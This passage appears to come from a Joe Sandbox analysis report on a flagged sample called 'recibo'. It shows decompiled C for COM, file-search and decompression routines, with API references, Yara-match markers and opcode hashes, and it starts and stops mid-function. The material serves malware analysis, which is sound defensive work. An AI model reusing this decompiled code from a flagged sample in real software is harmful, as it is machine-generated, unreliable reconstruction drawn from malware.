                                                                                  				intOrPtr _t61;
                                                                                  				intOrPtr* _t62;
                                                                                  				intOrPtr* _t64;
                                                                                  				intOrPtr* _t66;
                                                                                  				intOrPtr* _t68;
                                                                                  				intOrPtr* _t70;
                                                                                  				intOrPtr* _t72;
                                                                                  				intOrPtr* _t74;
                                                                                  				intOrPtr* _t76;
                                                                                  				intOrPtr* _t78;
                                                                                  				intOrPtr* _t80;
                                                                                  				void* _t83;
                                                                                  				intOrPtr* _t91;
                                                                                  				signed int _t101;
                                                                                  				signed int _t105;
                                                                                  				void* _t107;
                                                                                  
                                                                                  				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
                                                                                  				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
                                                                                  				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
                                                                                  				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
                                                                                  				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
                                                                                  				_t52 =  *(_t107 - 0x20);
                                                                                  				 *(_t107 - 0x50) = _t52 & 0x00000fff;
                                                                                  				_t101 = _t52 & 0x00008000;
                                                                                  				_t105 = _t52 >> 0x0000000c & 0x00000007;
                                                                                  				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
                                                                                  				if(E00405E83( *((intOrPtr*)(_t107 - 0x44))) == 0) {
                                                                                  					E00402DA6(0x21);
                                                                                  				}
                                                                                  				_t56 = _t107 + 8;
                                                                                  				__imp__CoCreateInstance(0x4085f0, _t83, 1, 0x4085e0, _t56);
                                                                                  				if(_t56 < _t83) {
                                                                                  					L14:
                                                                                  					 *((intOrPtr*)(_t107 - 4)) = 1;
                                                                                  					_push(0xfffffff0);
                                                                                  				} else {
                                                                                  					_t60 =  *((intOrPtr*)(_t107 + 8));
                                                                                  					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x408600, _t107 - 0x38);
                                                                                  					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
                                                                                  					if(_t61 >= _t83) {
                                                                                  						_t64 =  *((intOrPtr*)(_t107 + 8));
                                                                                  						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
                                                                                  						if(_t101 == _t83) {
                                                                                  							_t80 =  *((intOrPtr*)(_t107 + 8));
                                                                                  							 *((intOrPtr*)( *_t80 + 0x24))(_t80, 0x441000);
                                                                                  						}
                                                                                  						if(_t105 != _t83) {
                                                                                  							_t78 =  *((intOrPtr*)(_t107 + 8));
                                                                                  							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
                                                                                  						}
                                                                                  						_t66 =  *((intOrPtr*)(_t107 + 8));
                                                                                  						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
                                                                                  						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
                                                                                  						if( *_t91 != _t83) {
                                                                                  							_t76 =  *((intOrPtr*)(_t107 + 8));
                                                                                  							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
                                                                                  						}
                                                                                  						_t68 =  *((intOrPtr*)(_t107 + 8));
                                                                                  						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
                                                                                  						_t70 =  *((intOrPtr*)(_t107 + 8));
                                                                                  						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
                                                                                  						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                                                                  							_t74 =  *((intOrPtr*)(_t107 - 0x38));
                                                                                  							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
                                                                                  						}
                                                                                  						_t72 =  *((intOrPtr*)(_t107 - 0x38));
                                                                                  						 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                                                  					}
                                                                                  					_t62 =  *((intOrPtr*)(_t107 + 8));
                                                                                  					 *((intOrPtr*)( *_t62 + 8))(_t62);
                                                                                  					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                                                                  						_push(0xfffffff4);
                                                                                  					} else {
                                                                                  						goto L14;
                                                                                  					}
                                                                                  				}
                                                                                  				E00401423();
                                                                                  				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t107 - 4));
                                                                                  				return 0;
                                                                                  			}























                                                                                  APIs
                                                                                  • CoCreateInstance.OLE32(004085F0,?,00000001,004085E0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateInstance
                                                                                  • String ID:
                                                                                  • API String ID: 542301482-0
                                                                                  • Opcode ID: f0c7f0c58da5b2556a219b4126ec8a5e6c03aa9de5f34d462473648d541e39b0
                                                                                  • Instruction ID: 5977cb51530078b600b156af0050786de557c4b464dd586e6a5beaa7a0440451
                                                                                  • Opcode Fuzzy Hash: f0c7f0c58da5b2556a219b4126ec8a5e6c03aa9de5f34d462473648d541e39b0
                                                                                  • Instruction Fuzzy Hash: A7411571A00208EFCF40DFE4C989E9D7BB5BF49348B20456AF905EB2D1DB799981CB94
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: vq
                                                                                  • API String ID: 0-385929040
                                                                                  • Opcode ID: e758ae799d527833c53ce799999ca19a2c2a53c455f4646af13228a54bbb589d
                                                                                  • Instruction ID: 40eddd27dd1a751f77d297808aa35ecc647bab7d25b7f3cd0e2ec9c698eee96d
                                                                                  • Opcode Fuzzy Hash: e758ae799d527833c53ce799999ca19a2c2a53c455f4646af13228a54bbb589d
                                                                                  • Instruction Fuzzy Hash: 26D145716043068FDB359E29C9A53DA73B3EFA6350FA5816ECC8A8B605D7314A87CB41
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Fo
                                                                                  • API String ID: 0-989300405
                                                                                  • Opcode ID: 3301a25c822955c24cc35bc96135e3befe9459666ca8ee92c65da1ed440fc582
                                                                                  • Instruction ID: b75291faf1c99957f24f0ac79cec1c40f5386ace3c54a8829f826ea3467bb475
                                                                                  • Opcode Fuzzy Hash: 3301a25c822955c24cc35bc96135e3befe9459666ca8ee92c65da1ed440fc582
                                                                                  • Instruction Fuzzy Hash: 1C91D146E3E30699EB93303681B53E71385CF172C1D66875BCC6BB2865B71B0A8E85C6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Fo
                                                                                  • API String ID: 0-989300405
                                                                                  • Opcode ID: 371cd6644c7f73c504c1bf8efc0898d81824d87119c0845be80723ba822b9ba8
                                                                                  • Instruction ID: 049692deed0c5ddae41eba86a3782d27883f874ea186cac7318f21532977dd30
                                                                                  • Opcode Fuzzy Hash: 371cd6644c7f73c504c1bf8efc0898d81824d87119c0845be80723ba822b9ba8
                                                                                  • Instruction Fuzzy Hash: 17910346E3E30598EB93303681B53E71345CF132C1E26875BCC5BB2865771B0A8EC5C6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Fo
                                                                                  • API String ID: 0-989300405
                                                                                  • Opcode ID: 254d53505fadf424310141e82b00ae4f4e5837e3add748fe074b9a05d2f94c58
                                                                                  • Instruction ID: e928b5cb0c00b45545cdccdc0d56a562853239a20bf1ebc1e66a95d56fd31db4
                                                                                  • Opcode Fuzzy Hash: 254d53505fadf424310141e82b00ae4f4e5837e3add748fe074b9a05d2f94c58
                                                                                  • Instruction Fuzzy Hash: ED81E245E3E30698EB93303685753E71385CF172C1E66875FCC6BB2865B71B0A8E84C6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 39%
                                                                                  			E0040290B(short __ebx, short* __edi) {
                                                                                  				void* _t21;
                                                                                  
                                                                                  				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
                                                                                  					E00406484( *((intOrPtr*)(_t21 - 0xc)), _t8);
                                                                                  					_push(_t21 - 0x2b0);
                                                                                  					_push(__edi);
                                                                                  					E0040653D();
                                                                                  				} else {
                                                                                  					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
                                                                                  					 *__edi = __ebx;
                                                                                  					 *((intOrPtr*)(_t21 - 4)) = 1;
                                                                                  				}
                                                                                  				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t21 - 4));
                                                                                  				return 0;
                                                                                  			}





                                                                                  APIs
                                                                                  • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileFindFirst
                                                                                  • String ID:
                                                                                  • API String ID: 1974802433-0
                                                                                  • Opcode ID: 23bc45f7dafbc09bf3d58dfb9668e04a20f74da7ffae18e0ad0b6f577034eb1d
                                                                                  • Instruction ID: 3f6fbcf0fd4d311cdd608d5f72697756ed96b8559223cd5d9f1c4d92bc61f1b3
                                                                                  • Opcode Fuzzy Hash: 23bc45f7dafbc09bf3d58dfb9668e04a20f74da7ffae18e0ad0b6f577034eb1d
                                                                                  • Instruction Fuzzy Hash: 3CF08271A04105EFD701DBA4ED49AAEB378FF14314F60417BE116F21D0E7B88E159B29
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: vq
                                                                                  • API String ID: 0-385929040
                                                                                  • Opcode ID: 0dee7642daf65d700a0de0425d4c2d1ebe05287b9af1571a1f4a9cbc572e7a8e
                                                                                  • Instruction ID: bde1bf353cf150fcbede79a27a2c9d713b039dc10279e0eb64f8abdd83464752
                                                                                  • Opcode Fuzzy Hash: 0dee7642daf65d700a0de0425d4c2d1ebe05287b9af1571a1f4a9cbc572e7a8e
                                                                                  • Instruction Fuzzy Hash: 1171FF699442C44BC71B8A36C4A92D5BFD2EF5B320F385A9FDDC58BB56C2228847C391
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: vq
                                                                                  • API String ID: 0-385929040
                                                                                  • Opcode ID: 7e89edfe9700462bf77dc2651244e2efc53a123f05c44830807aec23422932be
                                                                                  • Instruction ID: fdd2932b4d8f138667113c0da8e4cac37318b294d5e6f666fe4c63045ab732f5
                                                                                  • Opcode Fuzzy Hash: 7e89edfe9700462bf77dc2651244e2efc53a123f05c44830807aec23422932be
                                                                                  • Instruction Fuzzy Hash: 5E717A7560434A9FDF229E38DDA47EA37B6AF5A390F90412EDC9ECB205D7314A81CB41
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd

                                                                                  C-Code - Quality: 79%
                                                                                  			E00406D85(signed int __ebx, signed int* __esi) {
                                                                                  				signed int _t396;
                                                                                  				signed int _t425;
                                                                                  				signed int _t442;
                                                                                  				signed int _t443;
                                                                                  				signed int* _t446;
                                                                                  				void* _t448;
                                                                                  
                                                                                  				L0:
                                                                                  				while(1) {
                                                                                  					L0:
                                                                                  					_t446 = __esi;
                                                                                  					_t425 = __ebx;
                                                                                  					if( *(_t448 - 0x34) == 0) {
                                                                                  						break;
                                                                                  					}
                                                                                  					L55:
                                                                                  					__eax =  *(__ebp - 0x38);
                                                                                  					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                  					__ecx = __ebx;
                                                                                  					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                  					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                  					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                  					__ebx = __ebx + 8;
                                                                                  					while(1) {
                                                                                  						L56:
                                                                                  						if(__ebx < 0xe) {
                                                                                  							goto L0;
                                                                                  						}
                                                                                  						L57:
                                                                                  						__eax =  *(__ebp - 0x40);
                                                                                  						__eax =  *(__ebp - 0x40) & 0x00003fff;
                                                                                  						__ecx = __eax;
                                                                                  						__esi[1] = __eax;
                                                                                  						__ecx = __eax & 0x0000001f;
                                                                                  						if(__cl > 0x1d) {
                                                                                  							L9:
                                                                                  							_t443 = _t442 | 0xffffffff;
                                                                                  							 *_t446 = 0x11;
                                                                                  							L10:
                                                                                  							_t446[0x147] =  *(_t448 - 0x40);
                                                                                  							_t446[0x146] = _t425;
                                                                                  							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
                                                                                  							L11:
                                                                                  							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
                                                                                  							_t446[0x26ea] =  *(_t448 - 0x30);
                                                                                  							E004074F4( *(_t448 + 8));
                                                                                  							return _t443;
                                                                                  						}
                                                                                  						L58:
                                                                                  						__eax = __eax & 0x000003e0;
                                                                                  						if(__eax > 0x3a0) {
                                                                                  							goto L9;
                                                                                  						}
                                                                                  						L59:
                                                                                  						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
                                                                                  						__ebx = __ebx - 0xe;
                                                                                  						_t94 =  &(__esi[2]);
                                                                                  						 *_t94 = __esi[2] & 0x00000000;
                                                                                  						 *__esi = 0xc;
                                                                                  						while(1) {
                                                                                  							L60:
                                                                                  							__esi[1] = __esi[1] >> 0xa;
                                                                                  							__eax = (__esi[1] >> 0xa) + 4;
                                                                                  							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                                                  								goto L68;
                                                                                  							}
                                                                                  							L61:
                                                                                  							while(1) {
                                                                                  								L64:
                                                                                  								if(__ebx >= 3) {
                                                                                  									break;
                                                                                  								}
                                                                                  								L62:
                                                                                  								if( *(__ebp - 0x34) == 0) {
                                                                                  									goto L182;
                                                                                  								}
                                                                                  								L63:
                                                                                  								__eax =  *(__ebp - 0x38);
                                                                                  								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                  								__ecx = __ebx;
                                                                                  								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                  								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                  								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                  								__ebx = __ebx + 8;
                                                                                  							}
                                                                                  							L65:
                                                                                  							__ecx = __esi[2];
                                                                                  							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
                                                                                  							__ebx = __ebx - 3;
                                                                                  							_t108 = __ecx + 0x4084d4; // 0x121110
                                                                                  							__ecx =  *_t108;
                                                                                  							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
                                                                                  							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
                                                                                  							__ecx = __esi[1];
                                                                                  							__esi[2] = __esi[2] + 1;
                                                                                  							__eax = __esi[2];
                                                                                  							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
                                                                                  							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
                                                                                  								goto L64;
                                                                                  							}
                                                                                  							L66:
                                                                                  							while(1) {
                                                                                  								L68:
                                                                                  								if(__esi[2] >= 0x13) {
                                                                                  									break;
                                                                                  								}
                                                                                  								L67:
                                                                                  								_t119 = __esi[2] + 0x4084d4; // 0x4000300
                                                                                  								__eax =  *_t119;
                                                                                  								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
                                                                                  								_t126 =  &(__esi[2]);
                                                                                  								 *_t126 = __esi[2] + 1;
                                                                                  							}
                                                                                  							L69:
                                                                                  							__ecx = __ebp - 8;
                                                                                  							__edi =  &(__esi[0x143]);
                                                                                  							 &(__esi[0x148]) =  &(__esi[0x144]);
                                                                                  							__eax = 0;
                                                                                  							 *(__ebp - 8) = 0;
                                                                                  							__eax =  &(__esi[3]);
                                                                                  							 *__edi = 7;
                                                                                  							__eax = E0040755C( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
                                                                                  							if(__eax != 0) {
                                                                                  								L72:
                                                                                  								 *__esi = 0x11;
                                                                                  								while(1) {
                                                                                  									L180:
                                                                                  									_t396 =  *_t446;
                                                                                  									if(_t396 > 0xf) {
                                                                                  										break;
                                                                                  									}
                                                                                  									L1:
                                                                                  									switch( *((intOrPtr*)(_t396 * 4 +  &M004074B4))) {
                                                                                  										case 0:
                                                                                  											L101:
                                                                                  											__eax = __esi[4] & 0x000000ff;
                                                                                  											__esi[3] = __esi[4] & 0x000000ff;
                                                                                  											__eax = __esi[5];
                                                                                  											__esi[2] = __esi[5];
                                                                                  											 *__esi = 1;
                                                                                  											goto L102;
                                                                                  										case 1:
                                                                                  											L102:
                                                                                  											__eax = __esi[3];
                                                                                  											while(1) {
                                                                                  												L105:
                                                                                  												__eflags = __ebx - __eax;
                                                                                  												if(__ebx >= __eax) {
                                                                                  													break;
                                                                                  												}
                                                                                  												L103:
                                                                                  												__eflags =  *(__ebp - 0x34);
                                                                                  												if( *(__ebp - 0x34) == 0) {
                                                                                  													goto L182;
                                                                                  												}
                                                                                  												L104:
                                                                                  												__ecx =  *(__ebp - 0x38);
                                                                                  												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                  												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                  												__ecx = __ebx;
                                                                                  												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                  												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                  												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                  												__ebx = __ebx + 8;
                                                                                  												__eflags = __ebx;
                                                                                  											}
                                                                                  											L106:
                                                                                  											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
                                                                                  											__eax = __eax &  *(__ebp - 0x40);
                                                                                  											__ecx = __esi[2];
                                                                                  											__eax = __esi[2] + __eax * 4;
                                                                                  											__ecx =  *(__eax + 1) & 0x000000ff;
                                                                                  											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                  											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                                                  											__ecx =  *__eax & 0x000000ff;
                                                                                  											__eflags = __ecx;
                                                                                  											if(__ecx != 0) {
                                                                                  												L108:
                                                                                  												__eflags = __cl & 0x00000010;
                                                                                  												if((__cl & 0x00000010) == 0) {
                                                                                  													L110:
                                                                                  													__eflags = __cl & 0x00000040;
                                                                                  													if((__cl & 0x00000040) == 0) {
                                                                                  														goto L125;
                                                                                  													}
                                                                                  													L111:
                                                                                  													__eflags = __cl & 0x00000020;
                                                                                  													if((__cl & 0x00000020) == 0) {
                                                                                  														goto L9;
                                                                                  													}
                                                                                  													L112:
                                                                                  													 *__esi = 7;
                                                                                  													goto L180;
                                                                                  												}
                                                                                  												L109:
                                                                                  												__esi[2] = __ecx;
                                                                                  												__esi[1] = __eax;
                                                                                  												 *__esi = 2;
                                                                                  												goto L180;
                                                                                  											}
                                                                                  											L107:
                                                                                  											__esi[2] = __eax;
                                                                                  											 *__esi = 6;
                                                                                  											goto L180;
                                                                                  										case 2:
                                                                                  											L113:
                                                                                  											__eax = __esi[2];
                                                                                  											while(1) {
                                                                                  												L116:
                                                                                  												__eflags = __ebx - __eax;
                                                                                  												if(__ebx >= __eax) {
                                                                                  													break;
                                                                                  												}
                                                                                  												L114:
                                                                                  												__eflags =  *(__ebp - 0x34);
                                                                                  												if( *(__ebp - 0x34) == 0) {
                                                                                  													goto L182;
                                                                                  												}
                                                                                  												L115:
                                                                                  												__ecx =  *(__ebp - 0x38);
                                                                                  												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                  												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                  												__ecx = __ebx;
                                                                                  												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                  												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                  												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                  												__ebx = __ebx + 8;
                                                                                  												__eflags = __ebx;
                                                                                  											}
                                                                                  											L117:
                                                                                  											 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                                  											__esi[1] = __esi[1] + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                                  											__ecx = __eax;
                                                                                  											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                  											__ebx = __ebx - __eax;
                                                                                  											__eflags = __ebx;
                                                                                  											__eax = __esi[4] & 0x000000ff;
                                                                                  											__esi[3] = __esi[4] & 0x000000ff;
                                                                                  											__eax = __esi[6];
                                                                                  											__esi[2] = __esi[6];
                                                                                  											 *__esi = 3;
                                                                                  											goto L118;
                                                                                  										case 3:
                                                                                  											L118:
                                                                                  											__eax = __esi[3];
                                                                                  											while(1) {
                                                                                  												L121:
                                                                                  												__eflags = __ebx - __eax;
                                                                                  												if(__ebx >= __eax) {
                                                                                  													break;
                                                                                  												}
                                                                                  												L119:
                                                                                  												__eflags =  *(__ebp - 0x34);
                                                                                  												if( *(__ebp - 0x34) == 0) {
                                                                                  													goto L182;
                                                                                  												}
                                                                                  												L120:
                                                                                  												__ecx =  *(__ebp - 0x38);
                                                                                  												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                  												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                  												__ecx = __ebx;
                                                                                  												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                  												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                  												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                  												__ebx = __ebx + 8;
                                                                                  												__eflags = __ebx;
                                                                                  											}
                                                                                  											L122:
                                                                                  											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
                                                                                  											__eax = __eax &  *(__ebp - 0x40);
                                                                                  											__ecx = __esi[2];
                                                                                  											__eax = __esi[2] + __eax * 4;
                                                                                  											__ecx =  *(__eax + 1) & 0x000000ff;
                                                                                  											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                  											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                                                  											__ecx =  *__eax & 0x000000ff;
                                                                                  											__eflags = __cl & 0x00000010;
                                                                                  											if((__cl & 0x00000010) == 0) {
                                                                                  												L124:
                                                                                  												__eflags = __cl & 0x00000040;
                                                                                  												if((__cl & 0x00000040) != 0) {
                                                                                  													goto L9;
                                                                                  												}
                                                                                  												L125:
                                                                                  												__esi[3] = __ecx;
                                                                                  												__ecx =  *(__eax + 2) & 0x0000ffff;
                                                                                  												__esi[2] = __eax;
                                                                                  												goto L180;
                                                                                  											}
                                                                                  											L123:
                                                                                  											__esi[2] = __ecx;
                                                                                  											__esi[3] = __eax;
                                                                                  											 *__esi = 4;
                                                                                  											goto L180;
                                                                                  										case 4:
                                                                                  											L126:
                                                                                  											__eax = __esi[2];
                                                                                  											while(1) {
                                                                                  												L129:
                                                                                  												__eflags = __ebx - __eax;
                                                                                  												if(__ebx >= __eax) {
                                                                                  													break;
                                                                                  												}
                                                                                  												L127:
                                                                                  												__eflags =  *(__ebp - 0x34);
                                                                                  												if( *(__ebp - 0x34) == 0) {
                                                                                  													goto L182;
                                                                                  												}
                                                                                  												L128:
                                                                                  												__ecx =  *(__ebp - 0x38);
                                                                                  												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                  												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                  												__ecx = __ebx;
                                                                                  												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                  												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                  												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                  												__ebx = __ebx + 8;
                                                                                  												__eflags = __ebx;
                                                                                  											}
                                                                                  											L130:
                                                                                  											 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                                  											__esi[3] = __esi[3] + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                                  											__ecx = __eax;
                                                                                  											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                  											__ebx = __ebx - __eax;
